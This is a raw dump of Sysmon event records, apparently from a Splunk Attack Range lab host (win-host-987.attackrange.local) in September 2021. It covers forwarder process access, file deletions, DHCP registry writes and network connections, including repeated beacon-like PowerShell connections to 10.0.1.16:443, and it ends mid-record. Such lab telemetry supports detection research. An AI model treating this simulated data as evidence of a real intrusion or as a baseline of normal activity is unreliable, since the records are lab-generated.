13:17:08.630{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.616{B81B27B7-A0D4-6140-8056-04000000C801}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8A0575635E1711C8C4050A1069442F3,SHA256=849ED4784F387D4B43C604C2215EB172FEFE71435D4961BE0154C804DF1D1488,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C27D0D36336E0C9D6AB1FCCD052631F4,SHA256=8A381DD8EF9E6C252997DA375204F4E999438B91DF5A9A4487992F3A414C009D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:08.078{B81B27B7-A0D3-6140-7F56-04000000C801}33803684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:09.461{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CCDAAD3FD0CCACF0FFF1B87CA1D4B90,SHA256=953AC96FAA687E6B263E55060914DCA14B42D66A70D2ABDE977347B76F75D6B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.047{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50528-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:09.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A862BC5AA4308B0599CD14BEA41AD9,SHA256=2CD2FB7863DE45642FA1942D639DB3D70C121A27A975A68208451DDA05DE829B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:09.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=501002CCB482BE4DE637DDB22B543193,SHA256=639F542F92ACF36726444CA38CE4BAE14EFF7B74FE3D4E079858ECC8CAB5DEA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:10.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3B598E19AE8D55D90286381945AD55A,SHA256=88F661F63D5849635D6097C1F0C0D366BC90D8F844FA90B50D0B58B386C541D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036497400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000036497399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\StaleAdapterDWORD (0x00000000) 13241300x800000000000000036497398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\CompartmentIdDWORD (0x00000001) 13241300x800000000000000036497397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\FlagsDWORD (0x00000002) 13241300x800000000000000036497396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\TtlDWORD (0x000004b0) 13241300x800000000000000036497395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\SentPriUpdateToIpBinary Data 13241300x800000000000000036497394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\SentUpdateToIpBinary Data 13241300x800000000000000036497393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\DnsServersBinary Data 13241300x800000000000000036497392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\HostAddrsBinary Data 13241300x800000000000000036497391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\PrimaryDomainNameattackrange.local 13241300x800000000000000036497390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\AdapterDomainName(Empty) 13241300x800000000000000036497389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\Hostnamewin-host-987 13241300x800000000000000036497388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000036497387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x800000000000000036497386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000036497385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\AddressTypeDWORD (0x00000000) 13241300x800000000000000036497384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseTerminatesTimeDWORD (0x6140aee7) 13241300x800000000000000036497383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\T2DWORD (0x6140ad25) 13241300x800000000000000036497382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\T1DWORD (0x6140a7df) 13241300x800000000000000036497381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseObtainedTimeDWORD (0x6140a0d7) 13241300x800000000000000036497380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\LeaseDWORD (0x00000e10) 13241300x800000000000000036497379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpServer10.0.1.1 13241300x800000000000000036497378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpSubnetMask255.255.255.0 13241300x800000000000000036497377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpIPAddress10.0.1.15 13241300x800000000000000036497376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:17:11.574{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{acf0e042-6ee8-44cf-93da-b1c31e741b40}\DhcpInterfaceOptionsBinary Data 23542300x800000000000000036497375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:11.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2155321BF6D2959F0AD2E8C94050FDB8,SHA256=89156621BEF2649E4BA841DD9F79C3F2D7E1A3690C93AE427348F126C95EAADF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:12.513{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AE81974BDDA8C4FE7F79402E039D410,SHA256=1663C3B49F173EE43DFDFFC4A2D6844FB1FD9E4FEC2F70BC0B8AC8CDBA9AE014,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:13.543{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0E4048F2FCF25783AF99F6AD6128C68,SHA256=DF152E4C18FF949B4AA37C22909388DCAA72AFEC1C342238B33E1190D52A02B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.928{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50529-false10.0.1.12-8000- 354300x800000000000000036497408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.266{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:3433:3933:28d1:a286:81df:ffff-50541-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x800000000000000036497407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.266{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:7073:809d:70b7:7bb9win-host-987.attackrange.local50541-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x800000000000000036497406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.265{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse239.255.255.250-1900ssdpfalse127.0.0.1win-host-987.attackrange.local65049- 354300x800000000000000036497405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.265{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse127.0.0.1win-host-987.attackrange.local65049-false239.255.255.250-1900ssdp 354300x800000000000000036497404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.265{B81B27B7-5BF8-611D-7304-00000000C801}5792C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local65048-false239.255.255.250-1900ssdp 354300x800000000000000036497403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.258{B81B27B7-4012-611D-1100-00000000C801}968C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.us-west-2.compute.internal67bootps 23542300x800000000000000036497402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:13.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5DDF64625E90BB74528A6A16383119C1,SHA256=4A61AFA837E179078CFBA14B334545C26CFF32927EC3EB0193F504DE75090312,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:44.059{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50530-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:14.574{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A18EB4F4445EF9B88B896CDE2D02511,SHA256=6FF0E70A8D7B7D96BAF20A717418C8807D95FCF6FC928BE8E6AF21FDA3735FCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:15.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1856DFD2EC76909EEC9709542606439,SHA256=B760A73ECCAF120EC8F833472C5BC715D681DA0D21FF6E99060F78C7C3C60677,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:16.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4519AFBF94C97F5FD97AC8DCD426AFD6,SHA256=AFDD674BBF8D9AB3D3449F5E7F9B59334ACAB90E2AE1C0270540CB8038879FFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:17.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2997ECC06CC8FD1A7A1C4171A92D9EE0,SHA256=80FAF5A5504848215CED499056351E78F9EE30DFCE676B1A2316A5E5BB19CCA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:49.071{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50531-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:18.670{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=672A38BBCC77A72853C579C5C6D0C03D,SHA256=7BA734CD20183FC113463DCAB0F99932C37DEB01F9D3DE63626D8DD7EB4A64F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:18.623{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7E73D584509DAB7EAFB51FC1C34A3BDC,SHA256=C557507FEB48ACA8370E1CF991168E04F514A96B9AE72BC55A7C54A8028A37E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:49.923{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50532-false10.0.1.12-8000- 23542300x800000000000000036497451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A29C376B84142485B9F3707B381F950C,SHA256=1CC8EB432A9E42621CF88927FF33D6DF0E47396FC4A34E00D6190D76C12F15A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 